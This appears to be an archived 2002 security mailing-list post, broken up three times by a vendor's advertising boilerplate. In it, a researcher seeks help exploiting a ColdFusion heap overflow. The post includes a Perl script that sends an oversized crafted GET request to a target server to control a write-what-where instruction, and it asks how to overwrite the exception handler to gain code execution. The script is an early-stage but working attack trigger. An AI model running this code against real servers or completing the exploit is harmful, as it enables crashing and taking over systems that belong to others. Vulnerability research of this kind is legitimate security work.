ColdFusion Heap Overflow

Hi all,

I need some help with a subject I have trying to get my head round for some time. I am attempting to write exploit code for the recent coldfusion heap overflow discovered by eeye. I don't fully understand heap overflows but here is where I'm at.

I can control the following values within the following instruction,

mov [ecx] , eax

where ecx and eax can be any value I specify. Thinking back to the .asp chunked transfer overflow, many people talked about and implemented exploits which overwrite the structured exception handler to gain EIP. Due to the fact my area is stack overflows I started by trying to overwrite the saved RET by specifying its location in [ecx] and the required value in eax. However this just caused the program to crash in a different place and the value in EBP was no where near where it was in the mov [ecx],eax instruction.

I am looking for the following;

How is the exception handler overwritten ? is it in a static place etc??

Papers or advice on exploiting this type of vulnerability.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

or any ideas using what I already have.

The following is the code I am currently using to overwrite the values in ecx and eax (ecx = 0x42424242 eax=0x41414141)

#Coldfusion HEAP overflow

if (@ARGV<1) {die "\nCold Fusion Heap Overflow. \n Usage \= IP/host:Port e.g. Perl $0 www.target.com\n";}
use Socket;
 ($host,$port)=split(/:/,@ARGV[0]);$target = inet_aton($host);  unless($port){$port = 80;}

###################

$len2 = "B" x 1000;

$len3 = "C" x 1000;

$len4 = "D" x 1000;

###################

 $len5 = "E" x 119;

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

 $len5 = $len5 ."BBBB"."AAAA". "e" x 175 ."n" x 175;

 $len6 = "X" x 500;

 $len = $len1 .$len2 .$len3.$len4.$len5.$len6;

 $getreq = 'GET /' . $len . '.cfm' .' HTTP/1.0';

$padrequest =
$getreq.
"\r\n".

'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*'.
"\r\n".

'Accept-Language: en-gb'.
"\r\n".

'Accept-Encoding: gzip, deflate'.
"\r\n".

'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461; .NET CLR 1.1.4322)'.
"\r\n".

'Host: '. $host.
"\r\n".

'Connection: Keep-Alive'.
"\r\n\r\n";

@result =sendraw($padrequest);
print $padrequest;
print length($padrequest);
#print @result;

sub sendraw { # this saves the whole transaction anyway  my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||   die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){   my @in;
  select(S); $|=1; print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { die("Can't connect...\n"); }
}

Thanks in advance.

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Kind Regards
Gary
Sec-1 Received on Thu Nov 14 12:06:35 2002